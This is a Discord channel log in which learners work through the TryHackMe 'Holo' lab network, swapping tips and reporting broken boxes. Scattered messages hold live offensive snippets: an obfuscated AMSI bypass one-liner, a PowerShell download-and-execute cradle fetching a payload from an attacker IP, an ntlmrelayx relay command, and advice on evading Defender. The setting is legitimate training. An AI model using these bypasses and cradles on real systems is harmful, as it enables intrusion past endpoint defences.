#holo-network

yeah, i did, like a few minutes ago

cool, just wanted to make sure -- I saw it was at 104/106 haha

did you end up getting it working?

ok, lol the question is submitted the last flag

yes worked only once

i added my user

gg no re lmao

and pressed ctrl c

by mistake and then

not again

I DM'd you the final flag on thm as well

yeah, psexec didnt work for me but smbexec did

will add a note ^

finally completed the network

Thanks @wind bobcat @lone spruce for making this awesome room and helping wherever i got stuck
thanks to you too @river cradle for all the help
waiting for more networks now lol

Gave +1 Rep to @wind bobcat

btw the S-SRV02 bug should be fixed by Tuesday at the latest

My powershell grunt doesn’t seem to work even when amsi is bypassed.
As far as I know amsi is bypassed anyway, because the payload I have works on my machine (not being picked up) but not from a remote machine. I may mess around with the listener and web ports (is it a a problem if they’re the same?) as I may have some weird firewall rule due to my setup.

I also need to change the HTTP profile in Covenant

yea it doesnt work because its blocked by defender 💀
i ended up using simple rev shell script from revshells.com

u need to clean

covenant

My php file downloads the stager.ps1 file from covenant, and this includes the AMSI bypass, and then includes the payload itself

How is defender blocking it if it’s being executed in memory? Surely only amsi should be of concern?

Is it defender blocking the execution or something? @livid shoal

As in noticing it’s suspicious and stopping it?

@wind bobcat could you please dm me?

regarding?

last flag

sent on THM

thought it was discord related at first lol

appreciated it

y'all are getting faster - 3 done in 24 hours 👀

we all might have discussed some mutual problems lol

which made it a lil faster

yeah

it does

maybe

How/why?

amsi is just one thing

Could I change the php payload to just execute the grunt there and then?

Would that bypass? Is it because I’m downloading something that it’s flagged? The download hits so it’s obviously my grunt which it doesn’t like. Or the AMSI bypass I have doesn’t work (the AMSI program checker thing returned no problematic strings) so I’m assuming AMSI is bypassed?

naah just make a PowerShell payload with amsi bypass at the top and the reverse shell code at the end. you can try covenant stager too but that didnt work for me. now from php just execute the ps1 file

Im stubborn lol

Imma keep on with my covenant stager and see how it goes

IEX(New-Object Net.WebClient).DownloadString('http://10.x.x.x:3333/yourpayload.ps1')

I have IEX (IWR http://etcetcetc)

And that works on my testbed machine but I do have an exclusion zone on the C drive. May have to add another drive to my VM and run it in there

yra try it

i was too but its easy to use simple reverse shell

Will have to get back to it tomorrow now. Thanks for your help

you need to clean covenant

its signatures are

easily detectable

I’ll change the profile and all settings, then will also look at its code and mess with that a little.

Can I stream holo on twitch if I plan to do it from Wednesday onwards? Just confirming as again it's for sub only ppl

go for it

we're at the point where people have completed it, so I don't mind

Gr8🔥 thx ❤️

Wait is the holo network available to everyone?

for subscribers only

Ok, nice, I'm going to connect now 🙂

im using covenant and all of my grunts keep dying. Real time detection is off and none of the modules actually work - all i get is 'command is uninitialised' for every task i try to use. Any ideas? I followed installation, and have a filepath exclusion for defender where covenant is installed.

okay it seems thats down to the powershell launcher

it dies

whenever i run a task

the binary launcher is fine

wait did u end up getting covenant working?

wow

i never did

🥲

no not yet

im testing locally

i think i will do the network again with covenant

to work out what my issue is

with an amsi bypass i could have it working

but

and big but

yes?

👀

the powershell launcher dies almost instantly

i cant task anything

even with real time protection off

ahhh

i get no errors at all

on either end

it just dies

defender

at its work

its not on

i disabled it

defender is always on. its a core windows feature. u need to clean the payload

rtp and defender are different things

oh right. but i turned real time protection off? and disabled all other settings.

u tried the payload on your local machine?

oh maybe...

yup

thats where im testing reight now

it works?

or not

binary yes

powershell no

powershell connects, but then dies

u getting any defender alerts?

also

even if rtp is off its not off on the main machine

none

so its of no use anyways

the server machine has it on

i have the binary working fully

no issues

real time protection on

now to test on the network

woah

it didnt work for me even if i

disabled that

idk why

i did nothing at all to the settings.

im going to soft reset and try again just to be sure

yea

try that

hmm im really stumped right now lol

trust me use powershell reverse shell payload first

then u can always

execute a binary

from covenant

by disabling everything

yup iy worked

binary launcher

i tweaked default settings for good measure

but yeah i downloaded with powershell IWR http://WEBADDRESS/launcher.exe -O launcher.exe; .\launcher.exe

nevermind

defender kills it again when i run a task

xD

exactly

it wont work

👀

use reverse shell

check the payload with threat check

once

it sent an email for gurag but didn't gave any token with it.

the token is right in front of u

👀

damm that's in cookie, all this time i was looking in user_token params

lol

Hi. I have a doubt about 'What file leaks the web server's current directory?' in Task 9. I have completed 50 % of the room now but not able to understand what is needed to answer this question.

The answer is related to running the tool discussed in the task. 🙂

┌──(tac㉿kali)-[~]
└─$ ping 10.200.124.33 1 ⨯
PING 10.200.124.33 (10.200.124.33) 56(84) bytes of data.
From 10.50.121.1 icmp_seq=1 Destination Host Unreachable
From 10.50.121.1 icmp_seq=2 Destination Host Unreachable
someone have issues too?

I am having issues

Could you be a little more verbose

try disconnecting/reconnecting to vpn

i did before ask

wait we need a reset_token not user_token

same

thing

append it ahead of the parameter

👀

it worked 🙂

🖨️ 🐛

👀 saupki ig u need to patch print nightmare vuln in holo if not already 👀 someone was trying that way. when i rdp once, the cve exploit was on the machine and someone was trying to execute it idk if they succeeded or not

if it was a challenge network, I'd be more concerned with it

however, the main goal of the network is to learn

if you're learning something by trailing print nightmare, good.

How is ur OSED spooks

whenever someone asks, I just provide them with this link:
https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/d--da--db--dc--dd--dd--df--dp--dq--du--dw--dw--dyb--dyd--display-memor

If anyone is still in the .69 network - Leave and rejoin the room and you'll be assigned to a network with less than 120~ people

wha- 120 people

omg

thats insane

woah and with this i am thinking 👀 will there be a challenge network in future?

likely. I'm really just waiting a bit before I decide to pitch one

ive got a million ideas

hope we get million more networks

lol

since I've got to make some changes anyways, I'll disable print spooler

thats nice. also i got a doubt. the attack we did in the last is not widely used. why so? didnt get that

because no one really ever thought to do it except me and some other dude

woah noice 👀
also how this part?

The reason this attack vector isn't widely used is that it is very disruptive. If the server is busy, you are unintentionally creating an SMB DoS and creating server downtime. In a real engagement, this is a huge problem

like how does it creates a smb dos

you're turning off SMB on the target system, preventing other devices from accessing it

I'm stuck on obfuscation shell part, can someone help out a bit. In small study room

i encrypted the payload but can't get it up on srv01

the command sc stop lanmanserver && sc disable lanmanserver disabled the actual SMB service from running

also no threats found in threatchecker, compiled that as well

ah isnt there a way to fake it somehow for the services . ( sorry if i am talking some senseless things really new to this stuff 😅 )

@livid shoal can you help if you are free a bit

No -- it's not so much that is you're physcially stopping the windows service from running on the machine, closing the port and redirecting all inbound traffic on the machine to you (the attacker), so you are effectively the listening SMB service. Not the windows machine.
The only possible way to make it accessible would be with some magic that I tried and it didn't end up working

magic 👀

like cant we do something, intercept the traffic and send it back to the machine at the same time too

no

you'd have to build something custom for it, and it'd take a ton of time and a ton of effort

yea but its a possibility? like in theory this can be done ?

anything is possible

theoretically here's the process that you'd have to take:

• Verify the credentials are valid against a device
• Hold the session open w/ NTLM Relay X
• send back the "ok authentication is all good" (which might destory the held open session w/ NTLM Relay X) on the target machine
• Proxy a connection between the pwned devices filesystem and your kali machine (since that'd be the device that's brokering the conversation)

Just because threat check says it’s clean doesn’t mean it is

look at the blog post referenced

my file is uploaded and windows is not deleting it for some time now

someone get stuck at resetting too? im waiting for three hour and nothing change

just verifying, you refreshed the page, correct?

It's like this for hours now..

yes, leave room,restart pc, i cant ping too, try with vpn and startbox

cc: @outer junco

I'll take a proper look into why this is happening, thanks for letting me know.

Hello, I'm stuck on AV Evasion, if I understand, we need a payload containing AMSI bypass (like Patching amsi.dll), a payload (a ping for example) and the entire payload need to be obfuscated. But This doesn't work for me. Have I forgot something ?

(I've check my payload with ThreatCheck too)

If you’re using a covenant grunt then obfuscation isn’t enough

They give info on killing any signatures

But

I'm not using covenant

Covenant is a real pain to get working

Okay what are you using?

I'm using https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse
and a simple ping command in a PS1 file

Have you tested your payload on a windows machine with defender on to see how it responds?

https://AMSI.fail

I've obfucated the file with Invoke-Obfuscation

I've check my file with ThreatCheck

Okay. It’s really hard to say why it won’t be working

But try it on a windows machine

That you can see output on

That way you know what’s going on and if it’s working.

Ok, if I have the good methodology, I'll try harder,
Thank you @next kite 😉

Gave +1 Rep to @next kite

No probs.

I ended up having a multi stage thing. Php file uploaded which downloaded a stage1. Stage 1 was the AMSI bypass, and then the bottom of stage 1 was to download stage 2, which was the revshell. I tried it all together as 1 launcher but it was being picked up and not executing

Good idea !

When you’re on you can disable AV

ok

Really struggling with the DLL stuff

I suck at windows lol

So far I think I found soenthing but I didn’t find it on scheduled tasks. Only by fluke because I checked ‘ps’ and also enumerated the users dirs

the thing doesnt execute even without my dll

syas i dont have permissions 😦

i dont suppose theres a reboot script which fixes things is there... lol

because you dont have permission to run it

Oh ok lol

a "user" on the network runs it

That makes senseeee.

I must have been doing the right thing then. Maybe.

I’ll have to look again tomorrowwww

as always I suggest testing on your own dedicated environment first

test your dll, download the application, make sure its the right DLL name, etc

Sure thing 🙂 im getting tired and lazy, should have just done that. I’ve done it every other step of the way

There was nothing in scheduled tasks @lone spruce - was there meant to be? Maybe I missed it but all of them had the path of ‘Microsoft’@something or another. I can’t remember exactly but away from my PC now

its there

might not show up for you now as your not an elevated user

Hi, can anyone help me with the privesc of L-SRV01? I always receive this message "Unable to find image 'alpine:latest' locally
docker: Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers).
See 'docker run --help'."

you should look and see what images are available for use and not just copy what's on gtfobins

Yeah, I had forgotten about that detail but I managed to resolve it a few minutes ago, but thanks for answering anyway

Gave +1 Rep to @wind bobcat

you could do that in one file only

rather than just bypassing it, i tried a simple ps1 which can be executed with php

just tried telnet and tried to listen it, but failed. So i don't think my exploit will work

any suggestions

I've starting with a ping and it works for me. In my machine I listen to ICMP packet with tcpdump to receive them

After that I've added complexity to bypass AMSI

nooo whyyyy. defender is still there

u need to bypass amsi

anyways

defender wont allow the connection

and wait telnet is not on windows?

is it?

it's not tried it

i created a obfucated web shell and got a simple web shell

now from there i'm trying to bypass the amsi

just for troubleshooting, can't figure out what i'm doing

Are labs even working?

It's like this for days now..

its sort of known issue

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) i tried it to bypass amsi

it works on my machine and then it can run the ps code but fails on the remote machine. I'm running windows 11 everything patched up.

why windows 11

been in insider program for long time, it was normal update 🙂

yea so try in a windows 10 vm

lol

second

check it

first

it picked up a ps script without bypassing amsi

after bypassing amsi it didn't picked up on windows 11

To land in PC-FILESRV01 we need to pass the hash, but it didn't work. Have I missed something ?

it

it's same, need help 😦

what help?

use rdp ig

nope cant do vc rn

Thx 😄

Gave +1 Rep to @livid shoal

no probs

Please keep all messages in English in this discord

got in but within 5 sec., my rdp session gets terminated

[16:48:36:723] [9008:9009] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_DISCONNECTED_BY_OTHER_CONNECTION [0x00010005]

||proxychains xfreerdp /v:10.200.128.31 /u:watamet|| this is what i used to connect

any suggestions ?

a step or some info should be added before task37 about RDP part of it

yet with this problem

lol u need to wait ig

maybe some other person have an active session

just wanted to know if it's a bug for me or someone is seriously logged in

so now i've to search how to kick someone out of session from ps 😆

nope, no one is in active session

try changing

rdp

client

trying

works

🙂

great

on file server task 37, logged in as user. As per task, I'm supposed to have access to Group Policy Editor

to enable access to applications

we need this access, but can't this gp

when i open secpol.msc, i get this

I can't found response for question 2 in Task 38:

What monitoring/event-logging solution is employed on PC-FILESRV01?
What have I missed ?

well how you bypassed applocker i can't even access group policy

Yes you can't acces to it, you don't have rights.

then how we are supposed to bypass it in task 37

but you can find folder where AppLocker doesn't work, take a look at applocker_check.ps1

ok for me i think then whole point is i don't have any applocker folder and applocker_check.ps1

you have to upload applocker_check.ps1 to the victim (with smbserver.py or python -m http.server)

did you find it, i can't find it as well. Trying to reset network

for me when i was trying to do priv esc changed few things in windows firewall

even wiped existing signatures 😆 cause of amsi

No, I can't find it :/

any suggestions for 2nd question in task 38

i tried both tools didn't got answer

@outer junco have you taken a look at .124 yet? Still stuck in a reset state

It just needs 1 more person to reset the network for it to come back online, looking through the logs to find the true cause of why it got stuck in resetting - as a quick fix if the user resets the network again, it'll bring the network back up.

placed both files in one dir but when i execute kavremover i get an error about admin privs

i tried two other injectors 1, Exterme injector 2. Xenox (i was able to see process but don't have access right to inject)

when i run kavremover tool a txt file will be dumped with these logs

i

i'm out of ideas how i can inject in this application

wha-

what you need to inject?

you dont run the application

^

a "user" on the network runs it

a dll from metasploit

u just place it

i placed it but never got the shell

the dll u used should have name not found on

procmon

while for testing when i injected it in notepad i got shell so atleast shell is working

can't run procmon as well need admin access

u need to run procmon

on your

machine

download that exe

to your vm and run it

see the processes

u mean exe ?

cause dll is payload

yea

sorry

got it

Pls fix holo it's state is paused..

it don't have kavremoverENU.dll

and that was my dll name but still i never got shell

renamed the file to other dll but still same

any suggestions

maybe can you guys recon one

have you tested it on your own machine first?

it could be a number of problems

are you fully reading the tasks before you just go and throw things around? Most of your questions you've asked have already been answered

am I the only one having problems reaching L-SRV01 via ping? I'm successfully connected to the network...

which network are you on?

69

that's an issue

leave and rejoin please?

It's just I straight away started from Hilo network as newbie sorry

that fixed it - thanks!

Gave +1 Rep to @wind bobcat

quite simple as: have you tried turn it of and on again 😉

well

try resetting the network ( if u got votes )

it didnt work for me as well for the first time.

but eventually it did

well do the basics first.

Holo is definitely not something you should just start with right out of the gate. It’s designed in such a way it teaches all concepts needed but it assumes some background knowledge to begin with

Holo taught me ton of thinks which I couldn't have learned from basic machines in this time

I made the mistake of just diving into the deepend of the pool and now I'm drowning

I am neural net developer from 2 years, have done windows automation with beatbox,powershell,python,.net for a year

Like I found different injectors extreme, xenox for dll hijacking. I'm trying my best to find out alternatives as well.

I have to do windows machines mainly been asked by my manager, I am working on a research to detect attacks in real-time on ad, so need ton of logs after attacking my home labs. Got a mail exchange servers network at home as well just for this in hybrid environment. Been reading few research papers as well. Writing an review paper currently 🙃.

u dont need them the injectors. did u read the instructions?

anyone else having connection issues??Having issues with the holo network, can ping but cannot access the dev and admin portals, everything was working well all this time

you added that to hosts file?

Oh for crap sakes, i was stuck with task 7 did a port scan but no port 80. eventually left the room got a new ip and got a port 80 open

is there something wrong with ip 10.200.69.33 ?

I mean the whole 10.200.69.0/24 network

yes

actually not but yea there were like 120 👀 persons on same network

so ....

well that explains 😅 thanks

i read the instructions but exploit was not working so i just wanted to test my dll if my reverse shell is valid or not. So i injected my dll in notepad and got user shell

just a trial and error

figure that out today

in task 46, it's nowhere mentioned we are supposed to turn off services on dc, srv02, or fileserver.

i disabled the services on fileserver and lost now

on which server we'r supposed to run shell from meterpreter and do port forwarding

also there is bug in task 38 What monitoring/event-logging solution is employed on PC-FILESRV01? we don't have any monitoring agent on the server atleast anymore if there should have been a amazon monitoring agent or something.

there is

+1

view event viewer

if u know about it you can find

it

u only have shell for file server

so thats what u

are working on

i have the admin shell on fileserver

why we have to create another shell.exe for the same server

yea u can avoid that

part

u need a meterpreter tho

if not already

ok got confused there

have the msf shell with me

nope we don;t have any agent atleast now

so here's what i did i picked up all the source from applications
PS C:\Users\watamet> Get-EventLog -LogName Application | select-object Source | clip

and used a regex which tryhackme expecting can be 6 words so i threw the output on regex101 and used a simple regex \w{6,6}

we don't have any possible candidates which can be a logging agent

https://tenor.com/view/gordon-ramsay-facepalm-stressed-headache-ugh-gif-17809450

Follow the tasks

i'm trying my best 🙂

Event logs are not mentioned once in the tasks

There's also learning in doing things that provide no expected results. 😄

manan told me to do it

i used seatbelt but didn't got any result

not the event logs

can u open event viewer ( use rdp ) idr exactly that i had the right for it or not ? if not then yea its a bug. it doesnt come in seatbelt logs

but its pretty common

so you can guess it

@radiant spindle

i'll try it tmrw only one task left now, will start throwback

the ntlmrelay take long time to catch something ?

about 10 min, and the network stop

the task says 1-3 min

@wind bobcat bork

@livid shoal how many time have you waited for ntlmrelay ?

if it doesn't come instantly, make sure you typed in all the commands correctly

if it doesn't work -- reboot the machine

all commands are corrects, all logic is in place, so I don't understand

Wireshark should still be installed - if you run it and filter on TCP port 139,135,445 do you see inbound SMB connections coming from S-SRV02?

and most importantly, you've installed the two packages in Kali and added the smb2support flag on ntlmrelayx?

Hi @wind bobcat can you send the S-SRV02 flag for me too, I already finished the DC.

WIll send it over on THM in a sec -- btw you don't have Task 27Q3, Task38 Q2 to do as well

Spooks babes you gonna fix that box?

in a minute

creating the feedback form since we're at 11 completes

sometimes it works instantly sometimes it takes time

1-3 mins is a sweet spot

All hashes that I try always I get an error message STATUS_TRUSTED_RELATIONSHIP_FAILURE from the S-SRV02 host.

Because spooks way borked that box

I’ve never seen a box do what it’s doing

because the machine needs to be readded to the domain. and that needs to be fixed

and that can only be done via local administrator account

i created a local relay with metasploit by turning off proxychains, but now when i use socks tag in ntlm realy i get no relays avaiable

and if i go with proxychains then i waited for like 10 min. didn't got anything

added the proxy in proxychains as well socks5 127.0.0.1 1080

have the connection in netstats as well tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -

+1

did you tried socks as well with ntlmrelay rather than proxychains, is it same for you in -socks as well ?

yes, the same

yo exact same

verified smb is off in local responder

╰─$ cat /etc/responder/Responder.conf                                                                          130 ↵
[Responder Core]

; Servers to start
SQL = On
SMB = Off

For the question 2 task 38 (event logging/monitoring) I've search with multiple tools (seatbelt, SharpEDR, Event Viewer) , looking around in C:/ directories, procmon, services, but I've found nothing. Something has change in this server ?

ok atleast started getting responses, here's what i did terminated my shell and waited for a new msf shell

once i got it forwarded the port while ntlmrelayx was on

the moment i forwarded the ports again, i started getting response on ntlmrelayx

but can't get hand of on relay, stuck on attacking target, from 5 min.,

was your pivot using sshuttle or chisel with socks? and are you running your ntlmrelay through that proxy

i terminated my chisel proxy

i created port forwarding through msf and then added address in proxychains

and used ntlmrelayx

because of the way the attack works, you will need to have ntlmrelay be proxied through the pivot for it to reach the target server

sudo ntlmrelayx.py -t smb://10.200.135.30 -smb2support -socks

in msf i have a portfwd for pivot

so if you were doing chisel, you'll need to get it back up + probably change the port to be something other than 1080 because that's the port ntlmrelay will try to bind to to create a proxy after making the session

lemme try

that's for forwarding :445 to your machine

you still need a way of reaching .30 from your machine

and unless you routed it through someting else, you will need to get your pivot back up

in chisel by default it picks up 1080 port in listener

you can change it by using R:port:socks instead of R:socks

so R:1081:socks for example

i think the main problem is dc can reach my machine but i can not, correct if i am wrong so we have to create another proxychain to listen

not to listen but yes, you can't reach the DC

so this is my proxychains nowsocks5 127.0.0.1 1080 socks5 127.0.0.1 1081

are you using proxychains or proxychains4?

proxychains

I'm using sshuttle for my pivot, ntlmrelay seem to work, but

you might need to comment out 1080 if it causes problems since it doesn't exist yet

are there any errors in the ntlmrelayx window/log after running this?

No errors :

try using secretsdump instead of psexec, and then psexec with the dumped hashes

without psexec we can create account for "mynewuser"

since secretsdump uses smb under the hood too, you can try to run it directly through the proxy without the need of a new user, that's what i did

also you might want to restart the relay and catch a fresh session, might be helpful

you won't need to re-forward the port, just restart the relay itself

use smbexec

psexec doesnt work for some reason

it's works

:)

I have a user domain admin, but when I'm trying to login in SERV02, I have this error :

[-] SMB SessionError: STATUS_TRUSTED_RELATIONSHIP_FAILURE(The logon request failed because the trust relationship between this workstation and the primary domain failed.)
Do you know why ?

.

+tech support

I cant login to the admin panel anymore, I get a 302 response with in the response body 'valid' but it keeps loading forever 😫

restart the browser, phpsession is valid for one time

Should have thought about that 😅 Thanks man!

Gave +1 Rep to @radiant spindle

also there is bug in question 2 of task 38 which monitoring agent is installed, please please look into that as well. There is no agent installed atleast anymore

Hi @wind bobcat can you send S-SRV02 flag to me as well

Hi @wind bobcat , Can you send me the S-SRV02 flag too plz ?

👀 i mean have u heard about sysinternals?

yup i do but that's not in tasks

I’ll look into it but I’m 80% sure it’s still there

@daring crest @radiant spindle shot you both messages over on thm

Any chance for a reset on the .106 network please. The program needed for the dll hinacking is gone so I can’t do it

Oh wait it’s here but not sure if it’s in the right place

Can I PM someone please to see if it’s in the right place!

Thanks 😄

Gave +1 Rep to @wind bobcat

I also can’t move it back

Or if someone is admin please could they send it back to the right place please. The scheduled task is no longer executing

I've added a +1 to reset your network

It’s been stuck on 2 for 2 days - I’ve checked regularly and been waiting. My files I created two days ago are still there. Admittedly should have just hit reset

Have you rooted it and done the dll task? Any chance you could move the file back as an admin please 🙂

It does have to run from a certain place right?

It’s currently in tasks (i don’t think it should be there)

Thanks

Gave +1 Rep to @daring crest

yes, the dll need to be in the good folder (i've placed it in multiple folder to be sure :p )

Thankyou amazing

This vm is also vulnerable to PrintNightmare LPE

we're aware

this is the official response on print nightmare -- We're not overly concerned w/ patching things like that. We're more up for teaching users new attack vectors -- if that's the way you wanted to do it, that's cool. As long as you learned something 🙂

no, it shouldnt probably someone messing around and moved it attempting to bypass applocker

Okayyy

I used print nightmare to get admin so I could move it back and get it working

It’s not right now for some reason but I’m on it 🙂

I just checked everything on PC-FILESRV01

everything you need is there

Yup I just fixed it

That’s why lol

Thankyou :))

on my local instance lol

ie the master instance for all the other networks

The logging agent, scheduled task, and application are all there

I’m unsure if the NTLM relay is working. I’ve been waiting 5 mins (I know the room says two or three). I disabled all required settings and have my meterpreter port forward going

It’s not

Ohh

spooks is losing his mind over it

Oh no

Hmm

What can I do for now then?

I can’t proceed with out it right?

Ask spooks for the flag lol

Is that @wind bobcat ?

I tried messaging but discord settings disallow it

Wait

I got something

it is nematode

S-SRV02 is the one that's broken

if it's been that long and you've triple checked the settings outlined in the task and aren't getting a session relayed to you, reboot PC-FILESRV

I just got something 🙂

ezpz

I just get connection refused lol

With psexec

Not sure my port forward is working

It says local relay created

And then I get connections from the srv admin

@wind bobcat

It may be as I’m running in WSL On windows commando and that has some funky networking

I’ll try shifting in just a minute.

a couple of others have said to try smbexec

Yeah it doesn’t seem to be working

Smb exec also doesn’t work for me. I get an error ‘don’t have a relay’ when I try it, but I have my meterpreter port forward, and I’m getting output from the NTLM relay

What am I doing wrong?

That’s running my vpn direct on the WSL VM so I don’t think it’s networking issues

Need to reset

Why?

I'm getting the Trust Relationship has failed when trying to RDP to S-SRV02 with the domain user I created. Any fix for that?

it's being worked on
if you need the srv02 flag then ping spooky

What’s going wrong in my NTLM relay above? I attached pictures to help debug.

Are you using sshuttle or chisel for your initial pivot? I couldn't get it to work with chisel, but worked with sshuttle.

I’m using chisel

I’ll have to try sshuttle

But I

It Shouldn’t make a difference becahse I have my shell from the file server through meterpreter that is port forwarding

the portfwd in msf is only on port 445

Yes but then ntlmrelayx also starts a procychains

So I need my sshuttle running still I guess

Thats what worked for me. Run shhuttle, and then drop the proxychains on the ntlmxrelay command.

Ah this is where I’m going to have issues

I’m working out of WSL

Which can’t use ip tables properly so sshuttle doesn’t work

Not sure on what you need to do then. I couldn't get it to work with Chisel since chisel and ntlmxrelay are both trying to use the socks proxy.

check PM's on THM

Awesome, thanks!

Gave +1 Rep to @wind bobcat

I’m going to look into how to change the port for chisels proxy

Or for ntlmrelayx

Can’t find anything with a quick google so may have to jump over to my parrot machine and just do from there where I can run it

use R:port:socks instead of R:socks in client arguments

Oh amazing Thankyou so much!!!

if you were to change the port for ntlmrelayx it involves modifying the source code which was problematic when i was trying it 😄

I moved over to a commando VM recently as figured it was way easier for attacking windows from windows. It is, as I’ve found here, but it has its quirks when it comes to networking. Im using WSL2 which just has weird stuff going on and it changes IP every boot

However it’s been worth it so far.

Maybe I’m overthinking. @river cradle but how do you specify for the impacket to go through the right proxy chains?

Is it you change config half way through? Or is it clever enough to worn it out

if you use proxychains4 instead of proxychains you can specify a config file with -f /path/to/config.conf which allows you to be more flexible with proxy configs

Okay cool Thankyou again 🙂

I really recommend using it instead of the old version and possibly aliasing proxychains to be proxychains4 since it's compatible but allows for those custom config locations

@wind bobcat I’ve done the room 🙂 just can’t get that srv2 flag. Would you mind messaging me please 🙂

Was the intention for NTLM relay to work for SRV2?

kinda, it should be possible but the SRV2 seems currently broken so domain credentials wouldn't work on it iirc

Yeah I tried passing the hash but it failed with a domain trust issue

Would someone mind helping me also with the ‘what monitoring/event logging solution’ is employed. I checked the hint and onoy have one process flagged and that’s not the answer

Thanks @river cradle that proxychains trick did it by the way 🙂

Gave +1 Rep to @river cradle

psa I've temporarily removed S-SRV02 flags

Now the last flag... what monitoring/event is running on PC-FILESRV01? I did put a procmon on the server, looked in files, but no signal of that solution. Can someone help me with this?

ahhh yea it doesnt come in logs or maybe i didnt enumerate much before i just remembered it by memory. but its a such a common option for it to be used in windows based systems

sysinternals

Hey - I am currently in the process of trying to get a reverse shell for the .33 machine - the fuzzing of RCE did not work at all, only by looking at the source code was I able to decipher which parameter should be vulnerable, when trying to query whoami via this parameter I dont get any response (except the header) when following the provided command curl -vvv ...etc - is this a known error?

update... someone disabled? the login again on 10.200.137...

@wind bobcat you take szymon off the file server?

why in the hell would I do that

Because you would

are you sure it was root and not linux-admin?

Yeah I'm sorry I just realised it was a stupid question

And I guess to be root, we need to use the SUID?

yup

ok something is off - so whenever I reset the network the login for the admin panel on 33 works the first time, but at some point the shell crashes/dies and then I cannot login with the credentials anymore?

I had the same problem, you have to restart the browser because the phpsession is only valid for one time.

😮 thank you!

Gave +1 Rep to @zenith canyon

^^ good solution. you can also open an incognito tab

I think that's what I advised the testers to do

Hey there don't suppose anyone can give me a nudge with task 12 ? Im fuzzing for the parameter for RCE and Im not sure Im even using the right wordlist now. I've been using the suggested one, seclists/../../big.txt, but im still finding nothing. I know the right page to fuzz I just can seem to get the parameter.

Is anyone able to give me a nudge or DM me about it ?

Can anyone please nudge me on the last step of task 12?

another way to locate it if you're having trouble fuzzing is to view the source code and look for some comments

hey hey

Ive got a slight issue with the IP addressing

have you tried dirbuster looking for .php files?

currently the ip is 192.168.100.1, but that routes automatically to my router

I got the file was just struggling to find the param to fuzz for rce, but i got it now

thanks tho

and Im unable to finish the first box

Cant you change your router gateway address ?

honestly thats the first time i've heard of a router being on 192.168.100.x

same here

try this https://www.netspotapp.com/how-to-change-router-settings.html

if you run the requests through proxychains so it goes through the proxy, it will route to the proper machine

not needed

all this should be done on the docker container

none of this should be done on an attacking Kali machine

just curious but is there a specific reason for that?

yeah, so docker essentially creates a nat'd network interface

on the docker container

but the docker container is behind the 192.168.100.1

^ yep, 100.1 is essentially the docker containers default gateway

which leads to L-SRV01

and that I cannot connect to

So basically as long as you're connecting from a VM or Docker on a Nat Connection it should be fine right?

.100.1 wont allow from my kali

100.1 won't be routable from your Kali machine.

you running kali on bare metal ?

the only device that can access it is L-SRV02, or the docker container.

how would I connect through the docker containter then

from the docker container.

task 15-18 will all be done from the docker container.

you will end up on L-SRV01 when you're finished.

I think this is getting lost in translation

yeah I think the wires are crosesd

as I was hunting for flags the ip changed

and my shell died

but anyways, is anyone else having issues getting on the admin domain ?

my shell died and been unable to log back into the admin domain to get my shell back

open a page in an incognito tab and try again

what the...

how did that work ?

php magic

kek

guess I go then

¯_(ツ)_/¯

• You won't access 192.168.100.1 from your Kali machine
• You access it from the machine you have gained command execution on
• The 192.168.100.0/24 network is for docker only.

• Two machines live in the 192.168.100.0/24 network, L-SRV01 and L-SRV02

• You will use the command execution gained in Task 12-13 to compromise 192.168.100.1 outlined in tasks 15-18

Basically do the RCE from task 12 again to get your shell, then you can get back on to the 192.168.100.x machines

Your router address doesnt effect this since you're on a different internal network

i cant get root using suid in task 19

don't use the alpine container

use one of the containers docker already has

ohh got it

don't blindly run commands, always try to understand what they're actually doing

there are 5 images. i can use any one?

is anyone around who could explain the d***er escape to me ? I get how it work I just dont understand how the syntax looks since sql doesnt seem to like php for a table name

maybe im misunderstanding but not sure and dont wanna spoil it for anyone

technically yes but stick to using the ubuntu one since others are for services and take up more space

essentially, what you're telling the SQL server to do is echo text (that being a php command shell) into a file on the system

dont you need to save the command shell as a table before you can echo it into a file ?

nope

lmao goddamn im an idiot then xp

thanks for that

you're fine lol

it was the way the steps are laid out in the task

I was wondering what the need is for making a new table

yeah, the traditional convention is that you'd dump the contents into a file for backups, or whatever

rockyou getting exhausted to crack the shadow passwords

which hash are you trying to crack?

root and linux-admin

The 10.200.69.33

is it asking the root password ?

the 69 subnet is broke

leave and rejoin

i actually have the root shell.

yes

the .69 subnet is broke

as I said before

you need to leave the room and rejoin

there is technical issues with that subnet specifically.

it was never meant for users to join it.

Ok leave the room and rejoin right?

yes

Ok

you will need to regenerate your vpn access for your new network too

i cracked the password in task 21. I still need to rejoin right?

yes so that you can continue the rest of the exploits

ok

proof that .69 is broken:

Hey hey coming back to say thanks for the help @wind bobcat, I admit that I didnt understand what was happening.
The shell died, the ip addresses seemed to shift and bugured up my stuff, but with you and slight nudges from zerefsec, Ive been able to get through most of the room!

Tldr, you did help and thank you.

Gave +1 Rep to @wind bobcat

How am I supposed to find the local ip of the docker container in task 15?. When I do ifconfig, or check it in the hosts file, the ip shows up as ||192.168.100.100||, but that's not correct

that is correct. 192.168.100.100 is the IP address of the docker container.

It's taking this as the answer for some reason

Am I confused, or is something not right

Just curious but if you run out of time on the network (yes 9 days should be long enough) can you try again another time or are you permanently locked out of doing that network challenge ?

Answers only have to be a certain percentage correct, this accounts for errors. Its normally 1 or 2 digits or characters.
If u refresh the page it'll show the full correct answer.

you can rejoin at any time as long as you have an active subscription

ah cool cool

was worried I would be locked out 😄

How long does one usually take to finish hololive ?

I thinking of starting it but just need to see if I can finish it today

It honestly depends it's possible to finish in a day

I see I get 9 days to finish it... Just hoping the IPs don't change

You're able to join back after it's just to free up space on the networks

IPs don't change unless you leave the network and rejoin

When the network stops I have to rejoin... but a basic scan should be enough

Hmmm guess I'm fuzzing around the wrong way here.... task9. a nudge is appreciated

Any idea why this happens?

